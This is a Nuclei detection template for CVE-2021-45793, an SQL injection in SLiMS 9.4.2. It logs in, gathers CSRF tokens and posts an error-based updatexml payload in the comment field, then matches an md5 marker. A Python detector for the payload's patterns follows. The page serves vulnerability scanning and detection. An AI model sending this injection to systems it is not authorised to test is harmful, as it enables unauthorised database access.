Slims9 Bulian 9.4.2 - SQL Injection

ID: CVE-2021-45793

Severity: high

Author: nblirwn

Tags: cve2021,cve,slims,sqli

Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.

id: CVE-2021-45793

info:
  name: Slims9 Bulian 9.4.2 - SQL Injection
  author: nblirwn
  severity: high
  description: |
    Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.
  reference:
    - https://github.com/slims/slims9_bulian/issues/123
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45793
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-45793
    cwe-id: CWE-89
    cpe: cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: slims
    product: senayan_library_management_system
  tags: cve2021,cve,slims,sqli

variables:
  num: "999999999"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /index.php?p=member&destination= HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php?p=member&destination= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        memberID={{username}}&memberPassWord={{password}}&_csrf_token_{{csrf_token}}={{csrf_token2}}&logMeIn=Login

    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        regex:
          - 'name="_csrf_token_([a-f0-9]+)"'
        internal: true

      - type: regex
        name: csrf_token2
        part: body
        group: 1
        regex:
          - 'value="([a-f0-9]+)"/>'
        internal: true

  - raw:
      - |
        GET /index.php?p=show_detail&id=1 HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf_token3
        part: body
        group: 1
        regex:
          - 'value="([a-f0-9]+)"/>'
        internal: true

  - raw:
      - |
        POST /index.php?p=show_detail&id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        comment=%27and%2F**%2F1%3D%28updatexml%281%2Cconcat%280x3a%2Cmd5%28{{num}}%29%29%2C1%29%29%2F**%2Fand%2F**%2F%271%27%3D%271&SaveComment=Save+comment&_csrf_token_{{csrf_token}}={{csrf_token3}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fd"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022065c8a61ba401da95766a85b43a0c4ab860d8093feeadd0709a7159717293ce41022100d79b60130c6e0aaca3c0acf13448b3f3e3795529bea874169914a3ae9fa653e9:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-45793.yaml"
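
For the defending side, the request this template sends in its last step can be recognised in captured request bodies. The following is an added example, not part of the template or of the SLiMS code base: it assumes you log form-encoded POST bodies for /index.php?p=show_detail (for instance at a reverse proxy or WAF), and the function names, reason labels and sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# MySQL XML functions abused for error-based extraction; the template's
# payload calls updatexml().
ERROR_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
# Inline comments standing in for spaces, as in the template's "/**/".
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# A quote immediately followed by a boolean keyword (heuristic, can misfire
# on prose such as "the 'and' operator").
QUOTE_BOOLEAN = re.compile(r"'\s*(and|or)\b", re.I)

# Constructed sample bodies: the first mirrors the template's request with
# {{num}} filled in, the second is an ordinary comment.
SAMPLE_ATTACK = (
    "comment=%27and%2F**%2F1%3D%28updatexml%281%2Cconcat%280x3a%2C"
    "md5%28999999999%29%29%2C1%29%29%2F**%2Fand%2F**%2F%271%27%3D%271"
    "&SaveComment=Save+comment&_csrf_token_aa=bb"
)
SAMPLE_BENIGN = (
    "comment=Great+book%2C+and+I%27d+read+it+again"
    "&SaveComment=Save+comment&_csrf_token_aa=bb"
)


def normalize(value: str) -> str:
    """Turn inline comments into spaces and collapse whitespace."""
    return re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", value)).strip()


def suspicious_comment(body: str) -> list[str]:
    """Return the reasons a body's `comment` field looks like SQL injection."""
    reasons = []
    # parse_qs percent-decodes values and maps '+' to a space.
    for raw in parse_qs(body, keep_blank_values=True).get("comment", []):
        text = normalize(raw)
        if ERROR_FUNCS.search(text):
            reasons.append("xml-error-function")
        if INLINE_COMMENT.search(raw):
            reasons.append("inline-comment-as-whitespace")
        if QUOTE_BOOLEAN.search(text):
            reasons.append("quote-breakout-boolean")
    return reasons


if __name__ == "__main__":
    for body in (SAMPLE_ATTACK, SAMPLE_BENIGN):
        print(suspicious_comment(body))
```

A non-empty result is a reason to review the request and the matching response, not proof of exploitation; the durable fix is to upgrade past the affected version.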